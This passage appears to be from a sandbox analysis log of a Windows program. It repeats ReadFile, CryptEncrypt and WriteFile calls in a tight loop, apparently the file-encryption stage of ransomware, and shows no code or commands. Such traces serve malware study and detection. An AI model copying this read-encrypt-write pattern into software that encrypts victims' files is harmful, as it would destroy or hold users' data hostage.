(in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.303] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.303] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.303] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.303] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.303] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.303] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.303] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.303] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.303] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.303] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.303] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.303] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.303] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.304] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.304] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.304] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.304] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.304] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.304] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.304] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.304] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.304] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.304] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.304] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.304] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.304] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.304] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.304] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.305] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.305] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.305] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.305] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.305] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.305] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.305] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.305] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.305] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.305] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.305] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.305] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.305] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.305] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.305] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.306] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.306] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.306] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.306] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.306] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.306] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.306] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.306] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.306] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.306] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.306] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.306] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.306] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.306] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.306] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.307] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.307] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.307] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.307] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.307] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.307] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.307] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.307] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.307] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.307] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.307] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.307] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.307] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.307] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.307] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.307] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.307] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.308] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.308] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.308] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.308] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.308] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.308] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.308] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.308] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.308] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.308] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.308] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.308] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.308] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.308] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.308] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.309] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.309] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.309] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.309] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.309] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.309] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.309] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.309] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, 